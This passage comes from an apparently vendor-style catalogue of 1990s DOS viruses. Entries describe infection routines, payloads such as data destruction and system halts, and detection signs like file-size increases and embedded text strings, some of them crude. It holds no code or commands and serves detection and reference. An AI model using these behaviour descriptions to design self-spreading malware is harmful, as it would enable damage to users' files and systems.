harmless <<---!!!!!!!" "*.* COMEXE" [Trivial] Virus Name: Trivial Alias Name: Minimal, Mini-45 Virus Type: File Virus Virus Length: 45 bytes Description: Infects *.COM files, as well as COMMAND.COM. When an infected file is executed, the virus will infect all *.COM files in same directory. The first 45 bytes of infected files will be overwritten by the virus. The date and time information of infected files will be updated to the time of infection. All infected files will be permanently corrupted. [V-sign] Virus Name: V-sign Alias Name: Cansu, Sigalet, Sigalit Virus Type: Boot Virus Virus Length: N/A Description: This virus infects floppy boot sectors. PC Vectors Hooked: INT 13h Infection method: When an infected disk is booted, the virus loads itself in memory. While loaded, it infects any accessed disk. The DOS CHKDSK program will show a "total bytes memory" decrease of 2 KB. Damage: After infecting 64 disks, the virus displays a large V and hangs the machine. [V2P6] Virus Name: V2P6 Alias Name: Virus Type: File Virus Virus Length: 1,946 to 2,111 bytes Description: This virus infects *.COM files. When an infected file is executed, the virus will infect the first uninfected *.COM file in the same directory. Infected files will experience a file length increase of 1,946 to 2,111 bytes with the virus being located at the end of the file. [Vacsina] Virus Name: Vacsina Alias Name: Vacsina.TP-05.A, TP family Virus Type: File Virus Virus Length: 1,206 bytes Description: This virus infects *.COM and *.EXE files. Infection method: When an infected file runs, the virus loads itself in memory. While loaded, it infects any file that executes. Before infecting .EXE files, the virus converts them to a .COM file format. Damage: None known Note: There are many known variants of the Vacsina virus. The Vacsina family of viruses is also known as the "T.P." family. [VCL] Virus Name: VCL Alias Name: Code Zero Virus Type: File Virus Virus Length: 576 bytes Description: Infects *.COM files, as well as COMMAND.COM. When an infected file is executed, the virus will search the same directory for an uninfected *.COM file. Infected files will experience a file length increase of 576 bytes with the virus being located at the end of the file. If no uninfected files are found, the following message is displayed: "** CODE ZERO **" Date and time information of infected files will not be altered. The following text string can be found in the virus: "*.* *.COM" "** CODE ZERO **" "Code Zero Virus" "1992 Nowhere Man/[NukE]" [Vengence] Virus Name: Vengence Alias Name: Parasite, Vengeance Virus Type: File Virus Virus Length: 723 bytes Description: Infects *.COM files, as well as COMMAND.COM. When an infected file is executed, the virus will infect the first uninfected *.COM file in the same directory. Infected files will experience a file length increase of 723 bytes with the virus being located at the end of the file. Date and time information of infected files will be altered to show 56 in the seconds field. The following text string can be found in the virus: "*** Vengeance is ours! ***" "SKISM/Phalcon '92" "PATH=*.COM" "????????COM" [Vienna] Virus Name: Vienna Alias Name: DOS-62, Unesco, Austrian, 648, PC Boot Virus Type: File Virus Virus Length: 648 bytes Description: This virus infects *.COM files. Symptoms: Increases infected file sizes by 648 bytes and files containing string "*.COM" and "PATH=". Destroyed programs will cause computer to reboot while in operation. Damage: With the probability of 1:7 the virus will not infect other files. Virus writes the instruction JMP F000:FFF0 (computer reboot) at the start of such a program. Original content is destroyed, length of file is not changed, and destroyed program contains virus flag. [XPEH] Virus Name: XPEH Alias Name: 4-B, Yankee Doodle.XPEH.4928, Micropox Virus Type: File Virus Virus Length: 4,016 bytes Description: This virus infects *.COM and *.EXE files. PC Vectors Hooked: INT 1Ch, INT 21h Infection method: When an infected file runs, the virus loads itself in memory. While loaded, it infects any accessed executable files. The DOS CHKDSK program will show a "total bytes memory" decrease of 4032 bytes. Infected files increase by 4016 bytes. Damage: Under analysis [Yank-D.TP.44.A] Virus Name: Yank-D.TP.44.A Alias Name: Yankee Doodle, TP44 Virus Type: File Virus Virus Length: 2,899 bytes Description: This virus infects *.COM and *.EXE files. When an infected file is executed, the virus installs itself into memory. Once the virus is memory resident, it plays the song "Yankee Doodle" on the computer speaker everyday at 5 p.m. Infected files will experience a file length increase of 2,899 bytes. [Yank.44.A] Other Name: Yank-44A Virus Type: File Virus Virus Length: Approximately 2880 bytes Virus Memory Type: Trigger Condition: Triggers if time is 5:00 pm of any day. Plays part of the song: "Jack and Jill" Run Directly: Loads virus code to high memory PC Vectors Hooked: Int 21 Infection Procedure: 1) Loads itself to high memory, allocating 3008 bytes. 2) Moves 2880 bytes onto the memory. 3) Infects *.COM and *.EXE files. Copies the virus code to the host program. Loads the virus first before running the host program. [Simple] Virus Name: Simple cd Virus Type: File Virus (infects .COM files only.) Virus Length: No change PC Vectors Hooked: None Execution Procedure: Searches for .COM files in the current directory. When it finds a .COM file it checks whether it has been previously infected by the SIMPLE virus. If "YES" it continues to look for uninfected .COM files. It then infects the file and looks for the next COM file until all the .COM files in the current directory are infected. Damage: Overwrites the original file, so the length of the original file won't reflect any increase. Note: Doesn't stay resident in memory. SIMPLE doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error present (such as write protect). [Alien-1] Virus Name: Alien-1 Virus Type: File Virus (infects .COM and .EXE files.) Virus Length: 571 Bytes (COM and EXE) PC Vectors Hooked: INT 21h Execution Procedure: Checks whether it has been loaded resident in high memory. If "No", then it loads itself resident into memory (highest memory) by hooking INT 21, then it executes the originally called file; if "Yes", then it directly executes the originally called file. Damage: None Characteristics: 1) The virus infects files by hooking INT 21h(AX=4B), when an uninfected file is executed, the file will be infected. 2) Alien-1 doesn't hook INT 24h when infecting files. Error messages occur if there is an I/O error (such as write protect). Detection Method: Infected files will increase by 571 bytes. [Lep-0736] Virus Name: Lep-0736 Virus Type: File Virus (infects .COM and .EXE files.) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Searches for .COM and .EXE files in current directory. 2) Checks whether the files found have been infected by LEP-0736. If "Yes", continue to look for an uninfected COM and EXE files. 3) Infects the uninfected file (infects only four files at a time). Then the following message appears on the screen: "Program too big to fit in memory" Damage: Overwrites the original file, so the length of the file won't increase. Detection Method: Check for the error message: "Program too big to fit in memory." Note: 1) Doesn't stay resident in memory. 2) LEP-0736 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Ice-199] Virus Name: Ice-199 Virus Type: File Virus (infects .COM files only.) Virus Length: 199 Bytes PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Checks whether it has been infected by Ice-199. If "Yes", continues to look for an uninfected .COM file. 3) Infects only one file at a time. Damage: None Detection Method: Infected files will increase length by 199 bytes. Note: 1) Doesn't stay resident in memory. 2) ICE-199 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Made-255] Virus Name: Made-255 Virus Type: File Virus (infects .COM files.) Virus Length: 255 Bytes PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Checks whether it has been infected by Made-255. If "Yes", it continues to look for an uninfected .COM file. 3) Infects only one file at a time. Damage: None Detection Method: Infected files will increase by 255 bytes. Note: 1) After an infected file is executed, the system will halt. 2) Doesn't stay resident in memory. 3) MADE-255 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [2570] Virus Name: 2570 Virus Type: File Virus (infects .COM files only) Virus Length: 2570 Bytes PC Vectors Hooked: None Execution Procedure: Searches for a .COM file in the current directory. Checks first to verify if the file has been previously infected by 2570. If "Yes", continues to look for an uninfected .COM file. Infects only one .COM file at a time. After infection, information such as those listed below will appear on the infected computer screen: a) Cycle sluts from hell.. b) Virus Mania IV.. c) 2 Live Crew is fucking cool.. d) Like Commentator I, HIP-HOP sucks.. e) dr. Ruth is a first-class lady!.. f) Don t be a wimp, Be dead!.. and so on. Then the originally called program will be executed. Damage: None Detection Method: Infected files will increase by 2570 bytes. Note: Doesn't stay resident in memory. 2570 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Ice-250] Virus Name: Ice-250 Virus Type: File Virus (infects .COM files) Virus Length: 250 Bytes PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Checks whether it has been infected by Ice-250. If "Yes", it continues to look for an uninfected .COM file. 3) It infects only one file at a time. Damage: None Detection Method: Infected files will increase by 250 bytes. Note: 1) Doesn't stay resident in memory. 2) ICE-250 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Ice-224] Virus Name: Ice-224 Virus Type: Virus Infector (infects .COM files) Virus Length: 224 Bytes PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Checks whether it has been infected by Ice-224. If "Yes", it continues to look for an uninfected .COM file. 3) Infects only one file at a time. Damage: None Detection Method: Infected files will increase by 224 bytes. Note: 1) Doesn't stay resident in memory. 2) ICE-224 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Lct-762] Virus Name: Lct-762 Virus Type: File Virus (infects .COM files) Virus Length: 762 Bytes PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Checks whether it has been infected by LCT-762. If "Yes", continues to look for an uninfected .COM file. 3) Infects uninfected files until all .COM files in the directory have been infected. Damage: None Detection Method: Infected files will increase by 762 bytes. Note: 1) Doesn't stay resident in memory. 2) LCT-762 doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [Alien-3] Virus Name: Alien-3 Virus Type: File Virus (infects .COM and .EXE files) Virus Length: 625 Bytes (COM and EXE) PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it has been loaded resident in high memory. If "No", then it loads itself resident into memory (highest memory portion) by hooking INT 21h. 2) The virus will then check the system time; if the number of minutes passed in the hour are between 33 to 60, it will display " " parentheses on the screen. 3) After infection it will then execute the original file. Damage: None Characteristics: 1) The virus infects files by hooking INT 21h (AX=4B), when an uninfected file is executed, the file will be infected. 2) Alien-3 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). Detection Method: Infected files will increase by 625 Bytes. [Lep-562] Virus Name: Lep-562 Virus Type: File Virus (infects .COM and .EXE files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) It first searches for a .COM or .EXE file in the current directory. 2) It checks whether it has been infected by LEP-562. If "Yes", it continues to look for uninfected .COM and .EXE files. 3) If "No" it will infect the uninfected files (infecting only four files at a time). When you execute the file the following message appears on the screen: "Program too big to fit in memory." Damage: Overwrites the original file, so the length of the file won't increase. Detection Method: Check for the message: "Program too big to fit in memory" on the screen. Note: 1) Doesn't stay resident in memory. 2) LEP-562 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Navi-282] Virus Name: Navi-282 Virus Type: File Virus (infects .COM files only) Virus Length: 282 Bytes PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Checks whether it has been infected by NAVI-282. If "Yes", it continues to look for any uninfected .COM files. 3) Infects only one file at a time. Damage: None Detection Method: Infected files will increase by 282 bytes. Note: 1) Doesn't stay resident in memory. 2) NAVI-282 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Minimite] Virus Name: Minimite Virus Type: File Virus (infects .COM files) Virus Length: 183 Bytes PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Checks whether it has been infected by Minimite. If "Yes", it continues to look for any uninfected .COM files. 3) It then continues to infect files until all .COM files in the directory have been infected. Damage: None Detection Method: Infected files will increase by 183 Bytes. Note: 1) Doesn't stay resident in memory. 2) Minimite doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Spanz] Virus Name: Spanz Virus Type: File Virus (infects .COM files) Virus Length: 639 Bytes PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) It then checks the date of the .COM file. 3) Checks whether it has been infected by Spanz. If "Yes", continues to look for any uninfected .COM files. 3) Infects only one file at a time. Damage: None Detection Method: Infected files will increase by 639 Bytes. Note: 1) Doesn't stay resident in memory. 2) Spanz doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Wilbur] Virus Name: Wilbur Virus Type: File Virus (infects .COM files) Virus Length: 512 Bytes PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) It then checks whether it has been infected by Wilbur. If "Yes", it continues to look for any uninfected .COM files. 3) It infects only one file at a time. 4) After infection it executes the originally called file. Damage: None Detection Method: Infected files will increase by 512 Bytes. Note: 1) Doesn't stay resident in memory. 2) Wilbur doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Repent] Virus Name: Repent Virus Type: File Virus (infects .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) It then checks whether it has been infected by Repent. If "Yes", it continues to look for any uninfected .COM files. 3) It infects only three files at a time. Damage: Overwrites original file, so the length of infected file won't increase. Note: 1) Doesn't stay resident in memory. 2) Repent doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Twin-Peak] Virus Name: Twin-Peak Virus Type: File Virus (infects .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Checks to see whether it has been infected by TWIN-PEAK. If "Yes", it continues to look for any uninfected .COM file. 3) It only infects one file at a time. Damage: Overwrites original file, so the length of infected file won't increase. Note: 1) Doesn't stay resident in memory. 2) TWIN-PEAK doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Pa-5792] Virus Name: Pa-5792 Virus Type: File Virus (infects .EXE files) Virus Length: 5792 Bytes PC Vectors Hooked: None Execution Procedure: 1) Searches for an .EXE file in the current directory and the "A:" drive. 2) It then checks whether it has been infected by PA-5792. If "Yes", it continues to look for any uninfected .EXE file. 3) It only infects seven files at a time. 4) It executes the originally called file. Damage: None Detection Method: Infected files will increase by 5792 Bytes. Note: 1) Doesn't stay resident in memory. 2) PA-5792 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Les] Virus Name: Les Virus Type: File Virus (infects .EXE files) Virus Length: 358 Bytes PC Vectors Hooked: None Execution Procedure: 1) Searches for an .EXE file in the current directory. 2) It then checks to see whether it has been infected by the LES virus. If "Yes", it continues to look for any uninfected .EXE file. 3) It finally infects all .EXE files in the directory. Damage: None Detection Method: Infected files will increase by 358 Bytes. Note: 1) Doesn't stay resident in memory. 2) LES doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [H & P] Virus Name: H&P Virus Type: File Virus (infects .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Searches for a COM file in the current directory. 2) It then checks whether it has been infected by H&P. If "Yes", it continues to look for any uninfected .COM files. 3) It only infects one file at a time. Damage: Overwrites original file, so the length of infected file won't increase. Note: 1) Doesn't stay resident in memory. 2) H&P doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [OW] Virus Name: Ow Virus Type: File Virus (infects .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Searches for a COM file in the current directory. 2) It then checks to see whether it has been already infected by OW. If "Yes", it continues to look for any uninfected .COM file. 3) It finally infects all files in the directory. Damage: Overwrites original files, so the length of infected file won't increase. Note: 1) Doesn't stay resident in memory. 2) OW doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Small115] Virus Name: Small115 Virus Type: File Virus (infects .COM files) Virus Length: 115 Bytes PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) It then checks whether it has been infected by Small115. If "Yes", it continues to look for any uninfected .COM file. 3) It finally infects all the .COM files in the directory. Damage: Infected files won't be able to execute. Detection Method: Infected files will increase by 115 Bytes. Note: 1) Doesn't stay resident in memory. 2) Small115 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error of (such as write protect). [Torm-263] Virus Name: Torm-263 Virus Type: File Virus (infects .COM files) Virus Length: 263 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) It then checks whether it has been infected by TORM-263. If "Yes", it continues to look for any uninfected .COM files. 3) It then infects all uninfected files in the directory. 4) Finally, it executes the original file. Damage: None Detection Method: Infected files will increase by 263 Bytes. Note: 1) Doesn't stay resident in memory. 2) TORM-263 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Radyum] Virus Name: Radyum Virus Type: File Virus (infects .COM files) Virus Length: 448 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) It checks whether it has been infected by Radyum. If "Yes", it continues to look for any uninfected .COM files. 3) It only infects one file at a time. 4) Finally it executes the original file. Damage: None Detection Method: Infected files will increase by 448 Bytes. Note: 1) Doesn't stay resident in memory. 2) Radyum doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Psycho] Virus Name: Psycho Virus Type: File Virus (infects .EXE and .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM or .EXE file in the current directory. 2) It checks whether the file has been infected by Psycho. If "Yes", it continues to search for an uninfected .COM or .EXE file. 3) It then infects all .EXE and .COM files in the directory. Damage: Overwrites original files, so the length of infected files won't increase. Note: 1) Doesn't stay resident in memory. 2) Psycho doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [VCL9] Virus Name: Vcl9 Virus Type: File Virus (infects .EXE and .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Searches for .COM or .EXE files in the current directory. 2) It checks whether the first file found has been infected by VCL9. If "Yes", it continues to look for any uninfected .COM or .EXE file. 3) It only infects two files at a time. Damage: Overwrites original files, so the length of infected files won't increase. Note: 1) Doesn't stay resident in memory. 2) VCL9 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Cheesy] Virus Name: Cheesy Virus Type: File Virus (infects .EXE files) Virus Length: 381 Bytes(EXE) PC Vectors Hooked: None Execution Procedure: 1) Searches for an .EXE file in the current directory. 2) When it locates an .EXE file it checks whether it has been infected by CHEESY. If "Yes", it continues to look for an uninfected .EXE file. 3) It then proceeds to infect all the .EXE files in the directory. 4) Once a file is executed the system halts. Damage: System halts Detection Method: Infected files will increase by 381 Bytes. Note: 1) Doesn't stay resident in memory. 2) CHEESY doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Dutch] Virus Name: Dutch Virus Type: File Virus (infects .COM files) Virus Length: 358 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) When it locates a file it checks whether it has been infected by Dutch. If "Yes", it continues to look for any uninfected .COM file. 3) It only infects one file at a time. Damage: None Detection Method: Infected files will increase by 358 Bytes. Note: 1) Doesn't stay resident in memory. 2) Dutch doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Mini-2] Virus Name: Mini-2 Virus Type: File Virus (infects .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Once it locates the first .COM file it checks whether it has been infected by MINI-2. If "Yes", it continues to look for any uninfected .COM files. 3) It then infects all .COM files in the directory. Damage: Overwrites original files, so the length of infected files won't increase. Note: 1) Doesn't stay resident in memory. 2) MINI-2 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Define-1] Virus Name: Define-1 Virus Type: File Virus (infects .EXE and .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Searches for an .EXE or .COM file in the current directory. 2) Once it locates a file it checks whether it has been infected by Define-1. If "Yes", it continues to look for another uninfected .COM or .EXE file. 3) It only infects one file at a time. Damage: Overwrites original file, so the length of infected file won't increase. Note: 1) Doesn't stay resident in memory. 2) Define-1 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [205] Virus Name: 205 Virus Type: File Virus (infects .COM files) Virus Length: 205 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) When it locates a .COM file it checks if the file has been previously infected by 205. If "Yes", it continues to look for an uninfected .COM file. 3) It then proceeds to infect all the .COM files in the directory. 4) Finally it executes the originally called file. Damage: None Detection Method: Infected files will increase by 205 Bytes. Note: 1) Doesn't stay resident in memory. 2) 205 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Banana] Virus Name: Banana Virus Type: File Virus (infects .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) When it locates a .COM file it checks whether or not it has been infected by Banana. If "Yes", it continues to search for another uninfected .COM file. 3) It then proceeds to infect all .COM files in the directory. Damage: Overwrites original file, so the length of infected file won't increase. Note: 1) Doesn't stay resident in memory. 2) Banana doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [334] Virus Name: 334 Virus Type: File Virus (infects .COM files) Virus Length: 334 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Once it locates a .COM file it checks whether it has been infected by 334. If "Yes", it continues to search for an uninfected .COM file. 3) It infects uninfected files one at a time. 4) Finally it executes the original file. Damage: None Detection Method: Infected files will increase by 334 Bytes. Note: 1) Doesn't stay resident in memory. 2) 334 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Redx-1] Virus Name: Redx-1 Virus Type: File Virus (infects .COM files) Virus Length: 796 Bytes PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the C:\ root directory. 2) Once it locates a .COM file it checks whether it has been infected by REDX-1. If "Yes", it continues searching for an uninfected .COM file. 3) It then infects other .COM files two at a time. 4) It finally executes the original file. Damage: None Detection Method: Infected files will increase by 796 Bytes. Note: 1) Doesn't stay resident in memory. 2) REDX-1 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Dismember] Virus Name: Dismember Virus Type: File Virus (infects .COM files) Virus Length: 288 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Once it locates a .COM file it checks whether it has been infected by Dismember. If "Yes", it continues to search for an uninfected .COM file. 3) It then infects all .COM files in the directory. 4) Finally, it executes the originally called file. Damage: None Detection Method: Infected files will increase by 288 Bytes. Note: 1) Doesn't stay resident in memory. 2) Dismember doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Timid] Virus Name: Timid Virus Type: File Virus (infects .COM files) Virus Length: 306 Bytes (COM) PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Once it locates a file it checks whether it has been infected by Timid. If "Yes", it continues to search for an uninfected .COM file. 3) It then infects one file at a time and displays the infected file name on the screen. 4) Once the file is executed the system will halt. Damage: Damages original file. Detection Method: 1) Infected files will increase by 306 Bytes. 2) Other file names are shown on the screen. Note: 1) Doesn't stay resident in memory. 2) Timid doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Druid] Virus Name: Druid Virus Type: File Virus (infects .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Searches for a COM file in the current directory. 2) Once it locates a file it checks whether it has been infected by Druid. If "Yes", it continues to search for any uninfected .COM file. 3) It then infects all .COM files in the directory. Damage: Overwrites original file, so the length of infected file won't increase. Note: 1) Doesn't stay resident in memory. 2) Druid doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Itti-B] Virus Name: Itti-B Virus Type: File Virus (infects .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Once it locates a file it checks whether it has been infected by ITTI-B. If "Yes", it continues to look for any uninfected .COM file. 3) It will only infect one file at a time. 4) It finally damages all the data on current disk if none of the .COM files are infected. Damage: 1) Overwrites original file, so the length of infected file won't increase. 2) Damages all data on current disk if none of the .COM files are infected. Note: 1) Doesn't stay resident in memory. 2) ITTI-B doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Itti-A] Virus Name: Itti-A Virus Type: File Virus (infects .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Once it locates a .COM file it checks whether it has been infected by ITTI-A. If "Yes", it continues to look for any uninfected .COM file. 3) It infects only one file at a time. Then when the file is executed the message "EXEC FAILURE" will show on the screen. 4) It will finally damage all data on current disk if no .COM file is infected. Damage: 1) Overwrites original file, so the length of infected file won't increase. 2) Damages all data on current disk if no .COM file is infected. Note: 1) Doesn't stay resident in memory. 2) ITTI-A doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Burger] Virus Name: Burger Virus Type: File Virus (infects .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Searches for a COM file in the current directory. 2) Checks whether it has been infected by Burger. If "Yes", it continues to look for an uninfected COM file. 3) Infects only one file at a time. 4) Damages all data on current disk if no .COM file is infected. Damage: 1) Overwrites original file, so the length of infected file won't increase. 2) Damages all data on current disk if no .COM file is infected. Note: 1) Doesn't stay resident in memory. 2) Burger doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as writing protect). [Bloodlust] Virus Name: Bloodlust Virus Type: File Virus (infects .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Searches for a *.C* file in the current directory. 2) Once it locates a file it checks whether it has been infected by Bloodlust. If "Yes", it continues to look for any uninfected *.C* file. 3) Once it locates an uninfected *.C* file it will infect it and will continue doing this until all *.C* files are infected. Damage: Overwrites original file, so the length of infected file won't increase. Note: 1) Doesn't stay resident in memory. 2) Bloodlust doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [ZY] Virus Name: Zy Virus Type: File Virus (infects .COM files) Virus Length: 463 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Once it locates a file it checks whether it has been infected by ZY. If "Yes", it continues to look for any uninfected .COM file. 3) It only infects one file at a time. 4) It finally executes the originally called file. Damage: None Detection Method: Infected files will increase by 463 Bytes. Note: 1) Doesn't stay resident in memory. 2) ZY doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Kode4-2] Virus Name: Kode4-2 Virus Type: File Virus (infects .COM files) Virus Length: About 3000 Bytes (COM) PC Vectors Hooked: None Execution Procedure: 1) Searches for a *.C* file in the current directory. 2) Infects all the *.C* files in the directory. 3) Then the following screen message will appear: "-=+ Kode4 +=-, The one and ONLY!" Damage: Overwrites original files. Detection Method: Check for the message, "-=+ Kode4 +=- The one and ONLY!" on the screen. Note: 1) Doesn't stay resident in memory. 2) Kode4-2 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Mini-212] Virus Name: Mini-212 Virus Type: File Virus (infects .COM files) Virus Length: 212 or 300 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory beginning with files starting with the letter "A" and randomly selecting files through the letter "Z". 2) It then checks the file whether it has been infected by MINI-212. If "Yes", it continues to look for an uninfected .COM file. 3) It only infects one file at a time. Damage: None Detection Method: Infected files will increase by 212 or 300 bytes. Note: 1) Doesn't stay resident in memory. 2) MINI-212 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Anna] Virus Name: Anna Virus Type: File Virus (infects .COM files) Virus Length: 742 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Once it locates a file it checks whether it has been infected by ANNA. If "Yes", it continues to look for any uninfected .COM file. 3) It will only infect one file at a time. 4) If no uninfected file is found in the current directory, it will continue to look for an uninfected file in another directory. 5) It will then check the system date. If it is December, then this message will appear on the screen: "Yole from the ARcV........." Damage: None Detection Method: 1) Infected files will increase by 742 Bytes. 2) If it is December the following message will appear on the screen: "Yole from the ARcV.......". Note: 1) Doesn't stay resident in memory. 2) ANNA doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as writing protect). [Grunt2] Virus Name: Grunt2 Virus Type: File Virus (infects .COM files) Virus Length: 427 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Once it locates a file it checks whether it has been infected by GRUNT2. If "Yes", it continues to look for any uninfected .COM file. 3) It will infect only one file at a time. 4) It then checks the system date. If the date is the 3rd of September and year is larger than 1993, it will delete a file on the current disk and then show the screen message: "S[GRUNT-2] -=> Agent Orange '92 <=- Rock of the Marne Sir!.......". Damage: If system date is 3rd of September and year is larger than 1993, the virus will delete a file on the current disk. Detection Method: Infected files will increase by 427 Bytes. Note: 1) Doesn't stay resident in memory. 2) GRUNT2 doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as a write protect). [VDV-853] Virus Name: Vdv-853 Virus Type: File Virus (infects .COM files) Virus Length: 853 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Checks whether the system date is between the 24th and 26th of December. If "yes", the virus will delete all files in the current directory, then will create a file with 273 bytes and show the message: "Frhliche Weihnachten wnscht der Verband Deutscher Virenliebhaber Ach ja, und dann wnschen wir auch noch viel Spab beim Suchen nach den Daten von der Festplatte! Hello - Copyright S&S International, 1990". 2) If "no", then it will search for a .COM file in the current directory. b) Once it locates a file it checks whether it has been infected by VDV-853. If "Yes", it continues to look for an uninfected .COM file. c) It will only infect four files at a time. Damage: If the system date is between the 24th and 26th of December, the virus will delete all files in the current directory. Detection Method: Infected files will increase by 853 Bytes. Note: 1) Doesn't stay resident in memory. 2) VDV-853 don't hook INT 24h when infecting files. Error message appears if there is an error of I/O (such as a write protect). 3) Virus pattern is the same as "SON_OF_VSC_2". [Wild Thing] Virus Name: Wild-Thing Virus Type: File Virus (infects .COM files) Virus Length: 567 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Checks whether the system date is Friday. If "yes", a message appears on the screen: " It's Friday ........ Enjoy the weekend with your computer![YAM '92]." Then the system halts. 2) If "no", then it will search for a .COM file in the current directory. Once it locates a file it checks whether it has been infected by Wild-Thing. If "Yes", it continues to look for another uninfected .COM file. 3) It will infect all files in the current and the "mother" directories until all .COM files become infected. 4) Then it will execute the original file. Damage: If the system date is Friday, this message appears: "It's Friday ....... Enjoy the weekend with your computer![YAM '92]." Then the system halts. Detection Method: Infected files will increase by 567 bytes. Note: 1) Doesn't stay resident in memory. 2) Wild-Thing doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as a write protect). [Arcv-Fri] 